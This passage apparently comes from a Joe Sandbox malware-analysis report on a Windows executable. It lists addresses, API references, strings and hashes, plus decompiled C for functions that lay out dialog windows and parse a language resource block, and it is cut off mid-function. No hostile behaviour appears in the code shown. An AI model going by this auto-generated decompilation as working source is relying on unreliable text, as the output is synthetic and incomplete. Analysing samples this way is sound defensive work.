0x00e7cb20
0x00e7cb21
0x00000000
0x00e7cb21
0x00e7cad2
0x00e7cad4
0x00e7cad5
0x00e7cad8
0x00000000
0x00000000
0x00000000
0x00e7cb53
0x00e7cb53
0x00e7cb56
0x00e7cb56
0x00e7cb5f
0x00e7cb64
0x00e7cb66
0x00e7cb68
0x00e7cb6a
0x00e7cb6a
0x00000000
0x00e7ca4f
0x00e7ca4f
0x00e7ca5c
0x00e7ca68
0x00e7ca6e
0x00e7ca6f
0x00e7ca70
0x00e7ca75
0x00e7ca76
0x00e7ca77
0x00e7ca79
0x00e7ca7f
0x00e7ca81
0x00e7ca94
0x00e7ca94
0x00e7cb74
0x00e7cb74
0x00e7cb7c
0x00e7cb86
0x00e7cb8d
0x00e7cb8d
0x00e7cb9a
0x00e7cba1
0x00e7cba6
0x00e7cbae
0x00e7cbba
0x00e7cbba
0x00e7cbc7
0x00e7cbcc
0x00e7cbd4
0x00e7cbde
0x00e7cbeb
0x00e7cbf2
0x00e7cbf2
0x00e7cbff
0x00e7cc06
0x00e7cc0b
0x00e7cc13
0x00e7cc19
0x00e7cc1b
0x00e7cc1b
0x00e7cc30
0x00e7cc35
0x00e7cc41
0x00e7cc43
0x00e7cc54
0x00e7cc61
0x00000000
0x00e7cc45
0x00e7cc50
0x00e7cc52
0x00e7cc66
0x00e7cc66
0x00e7cc72
0x00e7cc7f
0x00e7cc8b
0x00e7cc92
0x00e7cc97
0x00e7cc9e
0x00e7cca4
0x00e7cca6
0x00e7ccac
0x00e7ccb2
0x00e7ccb4
0x00e7ccbd
0x00e7ccc0
0x00e7ccc2
0x00e7cccb
0x00e7ccce
0x00e7ccd4
0x00e7ccd7
0x00e7cce0
0x00e7ccef
0x00e7ccf4
0x00e7ccfb
0x00e7ccfe
0x00e7cd0c
0x00e7cd0c
0x00000000
0x00e7ccfb
0x00000000
0x00e7cc52
0x00e7cc43
0x00000000
0x00e7cd14
0x00e7cd17
0x00e7cd19
0x00e7cd19
0x00000000
0x00000000
0x00e7c65d
0x00e7c665
0x00e7c66b
0x00e7c66e
0x00e7c692
0x00e7c670
0x00e7c670
0x00e7c673
0x00e7c686
0x00e7c675
0x00e7c675
0x00e7c677
0x00e7c67c
0x00e7c67c
0x00e7c673
0x00000000
0x00000000
0x00e7c799
0x00e7c79a
0x00e7c79f
0x00e7c79f
0x00e7c79f
0x00e7c7a2
0x00e7c7a7
0x00e7c7ad
0x00e7c7ad
0x00e7c7b3
0x00e7c7b9
0x00e7c7b9
0x00000000
0x00000000
0x00e7c0e8
0x00e7c0e8
0x00e7c0ed
0x00e7c0ee
0x00e7c0ef
0x00e7c0f4
0x00e7c0fa
0x00e7c0fd
0x00000000
0x00e7c0ff
0x00e7c0ff
0x00000000
0x00e7c0ff
0x00e7cd20
0x00e7cd20
0x00e7cd25
0x00e7cd29
0x00e7cd2d
0x00e7cd34
0x00e7cd3b
0x00e7cd3e
0x00e7cd43
0x00e7cd46
0x00e7cd49
0x00e7cd53

APIs

__EH_prolog.LIBCMT ref: 00E7C08A

Part of subcall function 00E7ACC6: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00E7AD8E

SetWindowTextW.USER32(?,?), ref: 00E7C3B7
_wcsrchr.LIBVCRUNTIME ref: 00E7C541
GetDlgItem.USER32(?,00000066), ref: 00E7C57C
SetWindowTextW.USER32(00000000,?), ref: 00E7C58C
SendMessageW.USER32(00000000,00000143,00000000,00EAA472), ref: 00E7C59A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E7C5C5

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00E7C460
ProgramFilesDir, xrefs: 00E7C48B
%s.%d.tmp, xrefs: 00E7C286
<br>, xrefs: 00E7C31A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 20beec9e754ba235a2dcc5bbc393ca69144292c7c97c963d111871a3589a6605
Instruction ID: b807128f491651e45903f5f7b3ed07a4b441a80b91b55d273b81a1a57273889d
Opcode Fuzzy Hash: 20beec9e754ba235a2dcc5bbc393ca69144292c7c97c963d111871a3589a6605
Instruction Fuzzy Hash: 1CE16172D04618AADF25EBA0DC45DEF77BCAF18315F1491AAF60DF3050EB709A848B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E6DD73 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00E6DD73(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				struct HWND__* _t107;
				signed int _t120;
				signed int _t135;
				void* _t151;
				void* _t156;
				char _t157;
				void* _t158;
				signed int _t159;
				intOrPtr _t161;
				void* _t164;
				void* _t170;
				long _t171;
				signed int _t175;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;

				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E00E63F8F( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00E718AE( &_v2208,  &_v2288, 0x50);
				_t96 = E00E83900( &_v2300);
				_t187 = _v8;
				_t156 = 0;
				_v2376 = _t96;
				_t210 =  *0xe9e5f4 - _t156; // 0x63
				if(_t210 <= 0) {
					L8:
					_t157 = E00E6D3AE(_t156, _t203, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t157;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t170 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t170 - _t179;
					if(_t157 == 0) {
						L15:
						_t222 = _a12;
						if(_a12 == 0 && E00E6D431(_t157, _v2368.bottom, _t222, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048); // executed
						}
						L18:
						_t206 = _t205 - GetSystemMetrics(8);
						_t107 = GetWindow(_t187, 5);
						_t188 = _t107;
						_v2368.bottom = _t188;
						if(_t157 == 0) {
							L24:
							return _t107;
						}
						_t158 = 0;
						while(_t188 != 0) {
							__eflags = _t158 - 0x200;
							if(_t158 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t188,  &_v2320);
							_t171 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t120 = (_t171 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t175 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xec2154(_t188, 0, (_t194 - (_v2352.right - _t120 % _t175 >> 1) - _v2352.bottom) * _v2368.right / _t175, _t120 / _t175, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t171 + 1) * _v2368.top / _t193, 0x204);
							_t107 = GetWindow(_t188, 2);
							_t188 = _t107;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L24;
							}
							_t158 = _t158 + 1;
							__eflags = _t158;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t159 = 0x64;
					asm("cdq");
					_t135 = _v2292 * _v2368.top;
					_t161 = _t179 * _v2368.right / _t159 + _v2352.right;
					_v2324 = _t161;
					asm("cdq");
					_t186 = _t135 % _v2352.top;
					_v2352.left = _t135 / _v2352.top + _t205;
					asm("cdq");
					asm("cdq");
					_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
					_t164 = (_t170 - _t161 - _t186 >> 1) + _v2352.bottom;
					if(_t164 < 0) {
						_t164 = 0;
					}
					if(_t201 < 0) {
						_t201 = 0;
					}
					 *0xec2154(_t187, 0, _t164, _t201, _v2324, _v2352.left,  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t187,  &_v2368);
					_t157 = _v2393;
					goto L15;
				} else {
					_t202 = 0xe9e154;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0xe946b8
							_t151 = E00E861B0( &_v2288,  *_t9, _t96);
							_t208 = _t208 + 0xc;
							if(_t151 == 0) {
								_t12 =  &(_t202[1]); // 0xe946b8
								if(E00E6D588(_t156, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048); // executed
								}
							}
							_t96 = _v2368.top;
						}
						_t156 = _t156 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t156 -  *0xe9e5f4; // 0x63
					} while (_t214 < 0);
					goto L8;
				}
			}

0x00e6dd8b
0x00e6dd95
0x00e6dd99
0x00e6dd9e
0x00e6ddb0
0x00e6ddba
0x00e6ddbf
0x00e6ddc6
0x00e6ddc9
0x00e6ddcd
0x00e6ddd3
0x00e6de30
0x00e6de48
0x00e6de50
0x00e6de54
0x00e6de60
0x00e6de72
0x00e6de79
0x00e6de7d
0x00e6de80
0x00e6de88
0x00e6de8e
0x00e6de94
0x00e6df37
0x00e6df37
0x00e6df3f
0x00e6df70
0x00e6df70
0x00e6df76
0x00e6df81
0x00e6df83
0x00e6df89
0x00e6df8b
0x00e6df91
0x00e6e043
0x00e6e043
0x00e6e043
0x00e6df97
0x00e6e031
0x00e6df9e
0x00e6dfa4
0x00000000
0x00000000
0x00e6dfb0
0x00e6dfba
0x00e6dfcf
0x00e6dfd4
0x00e6dfd7
0x00e6dfed
0x00e6dff5
0x00e6dff7
0x00e6dff8
0x00e6e000
0x00e6e012
0x00e6e019
0x00e6e022
0x00e6e028
0x00e6e02a
0x00e6e02e
0x00000000
0x00000000
0x00e6e030
0x00e6e030
0x00e6e030
0x00000000
0x00e6e031
0x00e6dea2
0x00000000
0x00000000
0x00e6deaf
0x00e6deb2
0x00e6debb
0x00e6dec0
0x00e6dec6
0x00e6deca
0x00e6decb
0x00e6ded1
0x00e6dedb
0x00e6dee2
0x00e6deeb
0x00e6deef
0x00e6def3
0x00e6def5
0x00e6def5
0x00e6def9
0x00e6defb
0x00e6defb
0x00e6df21
0x00e6df2d
0x00e6df33
0x00000000
0x00e6ddd5
0x00e6ddd5
0x00e6ddda
0x00e6dddd
0x00e6dde0
0x00e6dde8
0x00e6dded
0x00e6ddf2
0x00e6de03
0x00e6de0d
0x00e6de1a
0x00e6de1a
0x00e6de0d
0x00e6de20
0x00e6de20
0x00e6de24
0x00e6de25
0x00e6de28
0x00e6de28
0x00000000
0x00e6ddda

APIs

_swprintf.LIBCMT ref: 00E6DD99

Part of subcall function 00E63F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E63FA2

Part of subcall function 00E718AE: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00EA0EE8,?,00E6D4C2,00000000,?,00000050,00EA0EE8), ref: 00E718CB

_strlen.LIBCMT ref: 00E6DDBA
SetDlgItemTextW.USER32(?,00E9E154,?), ref: 00E6DE1A
GetWindowRect.USER32(?,?), ref: 00E6DE54
GetClientRect.USER32(?,?), ref: 00E6DE60
GetWindowLongW.USER32(?,000000F0), ref: 00E6DF00
GetWindowRect.USER32(?,?), ref: 00E6DF2D
SetWindowTextW.USER32(?,?), ref: 00E6DF70
GetSystemMetrics.USER32(00000008), ref: 00E6DF78
GetWindow.USER32(?,00000005), ref: 00E6DF83
GetWindowRect.USER32(00000000,?), ref: 00E6DFB0
GetWindow.USER32(00000000,00000002), ref: 00E6E022

Strings

CAPTION, xrefs: 00E6DF52
T, xrefs: 00E6DDD5
$%s:, xrefs: 00E6DD8D
d, xrefs: 00E6DE80

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$T$d
API String ID: 2407758923-3856749
Opcode ID: ceb742afa2172fdb80e5ede9c643a136e92b50d139267ff863508e1a84f138c3
Instruction ID: 15e760cc890df2be0d8e5d7238143775b7b1c9c063cb560a9329c0be5d4418a7
Opcode Fuzzy Hash: ceb742afa2172fdb80e5ede9c643a136e92b50d139267ff863508e1a84f138c3
Instruction Fuzzy Hash: 8581F071A083019FD714DF69DC84F6FBBE9EBC8744F04192DFA84A7290C671E8098B52

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D601 Relevance: 23.3, APIs: 3, Strings: 10, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00E6D601(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t200;
				void* _t201;
				WCHAR* _t202;
				void* _t207;
				signed int _t212;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t232;
				void* _t233;
				void* _t236;
				signed int _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t252;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int _t283;
				char* _t284;
				signed int _t288;
				short _t291;
				void* _t292;
				signed int _t298;
				signed int _t303;
				void* _t306;
				void* _t308;
				void* _t311;
				signed int _t320;
				intOrPtr* _t322;
				unsigned int _t332;
				signed int _t334;
				unsigned int _t337;
				signed int _t340;
				void* _t347;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				signed int _t361;
				signed int _t365;
				void* _t374;
				signed int _t376;
				signed int _t377;
				void* _t378;
				void* _t379;
				intOrPtr* _t380;
				signed int _t381;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				intOrPtr* _t391;
				signed int _t393;
				void* _t394;
				void* _t396;
				void* _t398;
				void* _t402;
				void* _t403;

				_t374 = __edx;
				_t322 = __ecx;
				E00E7E554(E00E921F7, _t394);
				E00E7E630();
				_t200 = 0x5c;
				_push(0x42f8);
				_push( *((intOrPtr*)(_t394 + 8)));
				_t391 = _t322;
				 *((intOrPtr*)(_t394 - 0x40)) = _t200;
				 *((intOrPtr*)(_t394 - 0x3c)) = _t391;
				_t201 = E00E8181A(_t322);
				_t320 = 0;
				_t400 = _t201;
				_t202 = _t394 - 0x12dc;
				if(_t201 != 0) {
					E00E70131(_t202,  *((intOrPtr*)(_t394 + 8)), 0x800);
				} else {
					GetModuleFileNameW(0, _t202, 0x800);
					 *((short*)(E00E6BE89(_t400, _t394 - 0x12dc))) = 0;
					E00E70109(_t400, _t394 - 0x12dc,  *((intOrPtr*)(_t394 + 8)), 0x800);
				}
				E00E697B6(_t394 - 0x2304);
				_push(4);
				 *(_t394 - 4) = _t320;
				_push(_t394 - 0x12dc);
				if(E00E69B50(_t394 - 0x2304, _t391) == 0) {
					L57:
					_t207 = E00E697F0(_t394 - 0x2304, _t391); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t394 - 0xc));
					return _t207;
				} else {
					_t384 = _t320;
					_t402 =  *0xe9e5f4 - _t384; // 0x63
					if(_t402 <= 0) {
						L7:
						E00E85D80(_t320, _t384, _t391,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E00E6D270);
						E00E85D80(_t320, _t384, _t391,  *((intOrPtr*)(_t391 + 0x14)),  *((intOrPtr*)(_t391 + 0x18)), 4, E00E6D1D0);
						_t398 = _t396 + 0x20;
						 *(_t394 - 0x15) = _t320;
						_t385 = _t384 | 0xffffffff;
						 *(_t394 - 0x2c) = _t320;
						 *(_t394 - 0x20) = _t385;
						while(_t385 == 0xffffffff) {
							 *(_t394 - 0x10) = E00E69FE0();
							_t298 = E00E69D90(_t394 - 0x2304, _t374, _t394 - 0x4304, 0x2000);
							 *(_t394 - 0x28) = _t298;
							_t388 = _t320;
							_t25 = _t298 - 0x10; // -16
							_t365 = _t25;
							 *(_t394 - 0x30) = _t365;
							if(_t365 < 0) {
								L25:
								_t299 =  *(_t394 - 0x10);
								_t385 =  *(_t394 - 0x20);
								L26:
								E00E69ED0(_t394 - 0x2304, _t394, _t299 +  *(_t394 - 0x28) + 0xfffffff0, _t320, _t320);
								_t303 =  *(_t394 - 0x2c) + 1;
								 *(_t394 - 0x2c) = _t303;
								__eflags = _t303 - 0x100;
								if(_t303 < 0x100) {
									continue;
								}
								__eflags = _t385 - 0xffffffff;
								if(_t385 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t394 + _t388 - 0x4304)) != 0x2a ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x2a) {
									L14:
									_t374 = 0x2a;
									if( *((intOrPtr*)(_t394 + _t388 - 0x4304)) != _t374) {
										L18:
										if( *((char*)(_t394 + _t388 - 0x4304)) != 0x52 ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x61) {
											L21:
											_t388 = _t388 + 1;
											if(_t388 >  *(_t394 - 0x30)) {
												goto L25;
											}
											_t298 =  *(_t394 - 0x28);
											continue;
										} else {
											_t306 = E00E861B0(_t394 - 0x4302 + _t388, 0xe938ec, 4);
											_t398 = _t398 + 0xc;
											if(_t306 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t370 = _t394 - 0x4300 + _t388;
									if( *((intOrPtr*)(_t394 - 0x4300 + _t388 - 2)) == _t374 && _t388 <= _t298 + 0xffffffe0) {
										_t308 = E00E85AF8(_t370, L"*messages***", 0xb);
										_t398 = _t398 + 0xc;
										if(_t308 == 0) {
											 *(_t394 - 0x15) = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t311 = E00E861B0(_t394 - 0x4302 + _t388, "*messages***", 0xb);
									_t398 = _t398 + 0xc;
									if(_t311 == 0) {
										L24:
										_t299 =  *(_t394 - 0x10);
										_t385 = _t388 +  *(_t394 - 0x10);
										 *(_t394 - 0x20) = _t385;
										goto L26;
									}
									_t298 =  *(_t394 - 0x28);
									goto L14;
								}
							}
						}
						asm("cdq");
						E00E69ED0(_t394 - 0x2304, _t394, _t385, _t374, _t320);
						_push(0x200002); // executed
						_t212 = E00E838A3(_t394 - 0x2304); // executed
						_t386 = _t212;
						 *(_t394 - 0x1c) = _t386;
						__eflags = _t386;
						if(_t386 == 0) {
							goto L57;
						}
						_t332 = E00E69D90(_t394 - 0x2304, _t374, _t386, 0x200000);
						 *(_t394 - 0x20) = _t332;
						__eflags =  *(_t394 - 0x15);
						if( *(_t394 - 0x15) == 0) {
							_push(2 + _t332 * 2);
							_t216 = E00E838A3(_t332);
							 *(_t394 - 0x30) = _t216;
							__eflags = _t216;
							if(_t216 == 0) {
								goto L57;
							}
							_t334 =  *(_t394 - 0x20);
							 *(_t334 + _t386) = _t320;
							__eflags = _t334 + 1;
							E00E71692(_t386, _t216, _t334 + 1);
							L00E8389E(_t386);
							_t386 =  *(_t394 - 0x30);
							_t337 =  *(_t394 - 0x20);
							 *(_t394 - 0x1c) = _t386;
							L33:
							_t219 = 0x100000;
							__eflags = _t337 - 0x100000;
							if(_t337 <= 0x100000) {
								_t219 = _t337;
							}
							 *((short*)(_t386 + _t219 * 2)) = 0;
							E00E700D6(_t394 - 0x14c, 0xe938f4, 0x64);
							_push(0x20002); // executed
							_t222 = E00E838A3(0); // executed
							 *(_t394 - 0x10) = _t222;
							__eflags = _t222;
							if(_t222 != 0) {
								__eflags =  *(_t394 - 0x20);
								_t340 = _t320;
								_t375 = _t320;
								 *(_t394 - 0x14) = _t340;
								 *(_t394 - 0x84) = _t320;
								_t387 = _t320;
								 *(_t394 - 0x28) = _t320;
								if( *(_t394 - 0x20) <= 0) {
									L54:
									E00E6D13A(_t391, _t375, _t394 - 0x84, _t222, _t340);
									L00E8389E( *(_t394 - 0x1c)); // executed
									L00E8389E( *(_t394 - 0x10));
									__eflags =  *((intOrPtr*)(_t391 + 0x2c)) - _t320;
									if( *((intOrPtr*)(_t391 + 0x2c)) <= _t320) {
										L56:
										 *0xea0f94 =  *((intOrPtr*)(_t391 + 0x28));
										E00E85D80(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x3c)),  *((intOrPtr*)(_t391 + 0x40)), 4, E00E6D330);
										E00E85D80(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x50)),  *((intOrPtr*)(_t391 + 0x54)), 4, E00E6D360);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00E6DCEC(_t391 + 0x3c, _t375, _t320);
										E00E6DCEC(_t391 + 0x50, _t375, _t320);
										_t320 = _t320 + 1;
										__eflags = _t320 -  *((intOrPtr*)(_t391 + 0x2c));
									} while (_t320 <  *((intOrPtr*)(_t391 + 0x2c)));
									goto L56;
								}
								 *((intOrPtr*)(_t394 - 0x34)) = 0xd;
								 *((intOrPtr*)(_t394 - 0x38)) = 0xa;
								 *(_t394 - 0x30) = 9;
								do {
									_t232 =  *(_t394 - 0x1c);
									__eflags = _t387;
									if(_t387 == 0) {
										L80:
										_t376 =  *(_t232 + _t387 * 2) & 0x0000ffff;
										_t387 = _t387 + 1;
										__eflags = _t376;
										if(_t376 == 0) {
											break;
										}
										__eflags = _t376 -  *((intOrPtr*)(_t394 - 0x40));
										if(_t376 !=  *((intOrPtr*)(_t394 - 0x40))) {
											_t233 = 0xd;
											__eflags = _t376 - _t233;
											if(_t376 == _t233) {
												L99:
												E00E6D13A(_t391,  *(_t394 - 0x28), _t394 - 0x84,  *(_t394 - 0x10), _t340);
												 *(_t394 - 0x84) = _t320;
												_t340 = _t320;
												 *(_t394 - 0x28) = _t320;
												L98:
												 *(_t394 - 0x14) = _t340;
												goto L52;
											}
											_t236 = 0xa;
											__eflags = _t376 - _t236;
											if(_t376 == _t236) {
												goto L99;
											}
											L96:
											__eflags = _t340 - 0x10000;
											if(_t340 >= 0x10000) {
												goto L52;
											}
											 *( *(_t394 - 0x10) + _t340 * 2) = _t376;
											_t340 = _t340 + 1;
											__eflags = _t340;
											goto L98;
										}
										__eflags = _t340 - 0x10000;
										if(_t340 >= 0x10000) {
											goto L52;
										}
										_t239 = ( *(_t232 + _t387 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0x22);
											L93:
											_pop(_t381);
											 *( *(_t394 - 0x10) + _t340 * 2) = _t381;
											_t340 = _t340 + 1;
											 *(_t394 - 0x14) = _t340;
											_t387 = _t387 + 1;
											goto L52;
										}
										_t241 = _t239 - 0x3a;
										__eflags = _t241;
										if(_t241 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t242 = _t241 - 0x12;
										__eflags = _t242;
										if(_t242 == 0) {
											_push(0xa);
											goto L93;
										}
										_t243 = _t242 - 4;
										__eflags = _t243;
										if(_t243 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t243 != 0;
										if(_t243 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t377 =  *(_t232 + _t387 * 2 - 2) & 0x0000ffff;
									__eflags = _t377 -  *((intOrPtr*)(_t394 - 0x34));
									if(_t377 ==  *((intOrPtr*)(_t394 - 0x34))) {
										L42:
										_t347 = 0x3a;
										__eflags =  *(_t232 + _t387 * 2) - _t347;
										if( *(_t232 + _t387 * 2) != _t347) {
											L71:
											 *(_t394 - 0x24) = _t232 + _t387 * 2;
											_t248 = E00E6FF9A( *(_t232 + _t387 * 2) & 0x0000ffff);
											__eflags = _t248;
											if(_t248 == 0) {
												L79:
												_t340 =  *(_t394 - 0x14);
												_t232 =  *(_t394 - 0x1c);
												goto L80;
											}
											E00E70131(_t394 - 0x2dc,  *(_t394 - 0x24), 0x64);
											_t252 = E00E85B75(_t394 - 0x2dc, L" \t,");
											 *(_t394 - 0x24) = _t252;
											__eflags = _t252;
											if(_t252 == 0) {
												goto L79;
											}
											 *_t252 = 0;
											E00E718AE(_t394 - 0x2dc, _t394 - 0x1b0, 0x64);
											E00E700D6(_t394 - 0xe8, _t394 - 0x14c, 0x64);
											E00E700AF(__eflags, _t394 - 0xe8, _t394 - 0x1b0, 0x64);
											E00E700D6(_t394 - 0x84, _t394 - 0xe8, 0x32);
											_t266 = E00E85BC9(_t320, 0, _t387, _t391, _t394 - 0xe8,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E00E6D310);
											_t398 = _t398 + 0x14;
											__eflags = _t266;
											if(_t266 != 0) {
												_t272 =  *_t266 * 0xc;
												__eflags = _t272;
												_t169 = _t272 + 0xe9e150; // 0x28b64ee0
												 *(_t394 - 0x28) =  *_t169;
											}
											_t387 = _t387 + ( *(_t394 - 0x24) - _t394 - 0x2dc >> 1) + 1;
											__eflags = _t387;
											_t271 =  *(_t394 - 0x1c);
											_t378 = 0x20;
											while(1) {
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												L77:
												__eflags = _t352 -  *(_t394 - 0x30);
												if(_t352 !=  *(_t394 - 0x30)) {
													L51:
													_t340 =  *(_t394 - 0x14);
													goto L52;
												}
												L78:
												_t387 = _t387 + 1;
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												goto L77;
											}
										}
										_t393 =  *(_t394 - 0x1c);
										_t274 = _t232 | 0xffffffff;
										__eflags = _t274;
										 *(_t394 - 0x2c) = _t274;
										 *(_t394 - 0x50) = L"STRINGS";
										 *(_t394 - 0x4c) = L"DIALOG";
										 *(_t394 - 0x48) = L"MENU";
										 *(_t394 - 0x44) = L"DIRECTION";
										 *(_t394 - 0x24) = _t320;
										do {
											 *(_t394 - 0x24) = E00E83883( *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)));
											_t276 = E00E85AF8(_t393 + 2 + _t387 * 2,  *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)), _t275);
											_t398 = _t398 + 0x10;
											_t379 = 0x20;
											__eflags = _t276;
											if(_t276 != 0) {
												L47:
												_t277 =  *(_t394 - 0x2c);
												goto L48;
											}
											_t361 =  *(_t394 - 0x24) + _t387;
											__eflags =  *((intOrPtr*)(_t393 + 2 + _t361 * 2)) - _t379;
											if( *((intOrPtr*)(_t393 + 2 + _t361 * 2)) > _t379) {
												goto L47;
											}
											_t277 = _t320;
											_t107 = _t361 + 1; // 0x200001
											_t387 = _t107;
											 *(_t394 - 0x2c) = _t277;
											L48:
											_t320 = _t320 + 1;
											__eflags = _t320 - 4;
										} while (_t320 < 4);
										_t391 =  *((intOrPtr*)(_t394 - 0x3c));
										_t320 = 0;
										__eflags = _t277;
										if(__eflags != 0) {
											_t232 =  *(_t394 - 0x1c);
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												L60:
												__eflags = _t355 -  *(_t394 - 0x30);
												if(_t355 !=  *(_t394 - 0x30)) {
													_t380 = _t232 + _t387 * 2;
													 *(_t394 - 0x24) = _t320;
													_t278 = 0x20;
													_t356 = _t320;
													__eflags =  *_t380 - _t278;
													if( *_t380 <= _t278) {
														L66:
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = 0;
														E00E718AE(_t394 - 0x214, _t394 - 0xe8, 0x64);
														_t387 = _t387 +  *(_t394 - 0x24);
														_t283 =  *(_t394 - 0x2c);
														__eflags = _t283 - 3;
